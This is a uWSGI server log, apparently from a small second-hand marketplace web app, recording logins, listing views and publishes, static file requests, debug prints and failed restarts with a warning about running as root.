0|req: 1600/1995] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:03:59 2021] POST /single/1/ => generated 27 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1601/1996] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:04:00 2021] GET /single/1/ => generated 9442 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +here +[pid: 11057|app: 0|req: 1602/1997] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:04:02 2021] POST /single/1/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1603/1998] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:04:02 2021] GET /single/1/ => generated 9442 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1604/1999] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:08:38 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1605/2000] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 11:08:38 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +...The work of process 11057 is done. Seeya! +worker 1 killed successfully (pid: 11057) +Respawned uWSGI worker 1 (new pid: 661) +123 123 +[pid: 661|app: 0|req: 1606/2001] 219.228.146.135 () {48 vars in 1100 bytes} [Thu Jan 14 11:08:53 2021] POST /publish/ => generated 0 bytes in 55 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1607/2002] 219.228.146.135 () {42 vars in 952 bytes} [Thu Jan 14 11:08:53 2021] GET /single/3 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1608/2003] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 11:08:53 2021] GET /single/3/ => generated 9304 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2004] 219.228.146.135 () {38 vars in 842 bytes} [Thu Jan 14 11:08:54 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2005] 219.228.146.135 () {38 vars in 830 bytes} [Thu Jan 14 11:08:54 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +here +[pid: 661|app: 0|req: 1609/2006] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 11:08:57 2021] POST /single/3/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1610/2007] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 11:08:57 2021] GET /single/3/ => generated 9304 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2008] 219.228.146.135 () {38 vars in 830 bytes} [Thu Jan 14 11:08:57 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1611/2009] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:08:59 2021] GET /ownpublish-0-0-0 => generated 9769 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1612/2010] 219.228.146.135 () {48 vars in 1039 bytes} [Thu Jan 14 11:09:01 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 28 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1613/2011] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 11:09:01 2021] GET /ownpublish-0-0-0 => generated 9303 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1614/2012] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:12:47 2021] GET /single/1/ => generated 9442 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1615/2013] 180.160.49.168 () {40 vars in 863 bytes} [Thu Jan 14 11:16:10 2021] GET /all-0-0-0 => generated 9901 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2014] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:16:10 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1616/2015] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:16:12 2021] GET /home/ => generated 8998 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1617/2016] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 11:16:17 2021] GET /ownpublish-0-0-0 => generated 10363 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1618/2017] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:19 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1619/2018] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:20 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1620/2019] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:22 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1621/2020] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:39 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1622/2021] 219.228.146.135 () {42 vars in 976 bytes} [Thu Jan 14 11:16:55 2021] GET /ownpublish-0-0-0 => generated 9472 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2022] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 11:16:55 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1623/2023] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 11:17:04 2021] GET /ownpublish-0-0-0 => generated 9472 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: / +[pid: 661|app: 0|req: 1624/2024] 219.228.146.135 () {38 vars in 853 bytes} [Thu Jan 14 11:17:11 2021] GET / => generated 3429 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1625/2025] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:17:16 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1626/2026] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:17:17 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1627/2027] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:17:27 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1628/2028] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:17:27 2021] GET /home/ => generated 8984 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1629/2029] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:17:32 2021] GET /all-0-0-0 => generated 9887 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2030] 219.228.146.135 () {38 vars in 850 bytes} [Thu Jan 14 11:17:32 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1630/2031] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:17:37 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1631/2032] 180.160.49.168 () {40 vars in 884 bytes} [Thu Jan 14 11:17:39 2021] GET /home/ => generated 8998 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 19:19:27 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-8-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: /www/wwwroot/master +detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 3874 +your memory page size is 4096 bytes +detected max file descriptor number: 100001 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +probably another instance of uWSGI is running on the same address (0.0.0.0:8000). +bind(): Address already in use [core/socket.c line 769] +[pid: 661|app: 0|req: 1632/2033] 219.228.146.135 () {42 vars in 951 bytes} [Thu Jan 14 11:19:42 2021] GET /all-0-0-0 => generated 9887 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2034] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:19:43 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2035] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:19:43 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1633/2036] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:19:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1634/2037] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:20:01 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1635/2038] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:20:01 2021] GET /home/ => generated 8984 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1636/2039] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:20:04 2021] GET /all-0-0-0 => generated 9887 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1637/2040] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 11:20:12 2021] GET /all-0-0-0 => generated 9887 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 19:21:49 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-8-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: /www/wwwroot/master +detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 3874 +your memory page size is 4096 bytes +detected max file descriptor number: 100001 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +probably another instance of uWSGI is running on the same address (0.0.0.0:8000). +bind(): Address already in use [core/socket.c line 769] +[pid: 661|app: 0|req: 1638/2041] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 11:21:53 2021] GET /all-0-0-0 => generated 9887 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2042] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:21:53 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1639/2043] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:21:56 2021] GET /ownpublish-0-0-0 => generated 9303 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1640/2044] 219.228.146.135 () {40 vars in 931 bytes} [Thu Jan 14 11:21:59 2021] GET /all-0-0-0 => generated 9887 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1641/2045] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 11:22:08 2021] GET /all-0-0-0 => generated 9901 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2046] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:22:08 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1642/2047] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:22:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2048] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 11:22:08 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2049] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 11:22:08 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[] +[pid: 661|app: 0|req: 1643/2050] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:22:17 2021] GET /all-3-0-0 => generated 9085 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1644/2051] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:22:19 2021] GET /all-0-0-0 => generated 9901 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1645/2052] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:22:19 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1646/2053] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:22:19 2021] GET /home/ => generated 8984 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1647/2054] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:22:22 2021] GET /all-0-0-0 => generated 9887 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2055] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:22:23 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1648/2056] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 11:23:38 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1649/2057] 180.160.49.168 () {48 vars in 959 bytes} [Thu Jan 14 11:24:02 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1650/2058] 180.160.49.168 () {40 vars in 873 bytes} [Thu Jan 14 11:24:02 2021] GET /home/ => generated 9007 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1651/2059] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 11:24:05 2021] GET /publish/ => generated 5234 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +旧书低价出售:高等数学 全套只要20 +[pid: 661|app: 0|req: 1652/2060] 180.160.49.168 () {48 vars in 1064 bytes} [Thu Jan 14 11:26:51 2021] POST /publish/ => generated 0 bytes in 205 msecs (HTTP/1.1 302) 7 headers in 202 bytes (60 switches on core 1) +[pid: 661|app: 0|req: 1653/2061] 180.160.49.168 () {42 vars in 913 bytes} [Thu Jan 14 11:26:51 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1654/2062] 180.160.49.168 () {42 vars in 915 bytes} [Thu Jan 14 11:26:51 2021] GET /single/4/ => generated 9430 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2063] 180.160.49.168 () {38 vars in 805 bytes} [Thu Jan 14 11:26:51 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1655/2064] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:26:56 2021] GET /all-0-0-0 => generated 10303 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2065] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:26:56 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2066] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:26:56 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1656/2067] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:27:05 2021] GET /single/4/ => generated 9430 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2068] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:27:05 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: / +[pid: 661|app: 0|req: 1657/2069] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 11:27:31 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1658/2070] 219.228.146.135 () {40 vars in 902 bytes} [Thu Jan 14 11:33:11 2021] GET /all-0-0-0 => generated 10473 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2071] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:33:11 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2072] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 11:33:11 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1659/2073] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:33:20 2021] GET /ownpublish-0-0-0 => generated 9430 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1660/2074] 219.228.146.135 () {42 vars in 969 bytes} [Thu Jan 14 11:33:24 2021] GET /ownpublish-0-0-0 => generated 9430 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2075] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 11:33:24 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1661/2076] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:35:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1662/2077] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:35:19 2021] POST /login/ => generated 27 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1663/2078] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:35:19 2021] GET /home/ => generated 8984 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1664/2079] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:35:22 2021] GET /all-0-0-0 => generated 10473 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2080] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 11:35:23 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2081] 219.228.146.135 () {40 vars in 863 bytes} [Thu Jan 14 11:35:23 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2082] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 11:35:23 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1665/2083] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:14 2021] GET /all-0-0-0 => generated 10496 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2084] 180.160.49.168 () {40 vars in 818 bytes} [Thu Jan 14 11:36:14 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2085] 180.160.49.168 () {40 vars in 826 bytes} [Thu Jan 14 11:36:14 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2086] 180.160.49.168 () {40 vars in 801 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2087] 180.160.49.168 () {40 vars in 799 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2088] 180.160.49.168 () {40 vars in 807 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2089] 180.160.49.168 () {40 vars in 817 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2090] 180.160.49.168 () {40 vars in 858 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2091] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2092] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2093] 180.160.49.168 () {40 vars in 869 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1666/2094] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 11:36:22 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2095] 180.160.49.168 () {40 vars in 814 bytes} [Thu Jan 14 11:36:22 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1667/2096] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:34 2021] GET /single/1/ => generated 9451 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2097] 180.160.49.168 () {40 vars in 840 bytes} [Thu Jan 14 11:36:34 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2098] 180.160.49.168 () {40 vars in 822 bytes} [Thu Jan 14 11:36:35 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2099] 180.160.49.168 () {40 vars in 846 bytes} [Thu Jan 14 11:36:35 2021] GET /static/img/dianzan.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2100] 180.160.49.168 () {40 vars in 875 bytes} [Thu Jan 14 11:36:37 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1668/2101] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:39 2021] GET /single/2/ => generated 9552 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1669/2102] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:43 2021] GET /single/4/ => generated 9430 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1670/2103] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 11:37:12 2021] GET /publish/ => generated 5234 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1671/2104] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:37:15 2021] GET /home/ => generated 9007 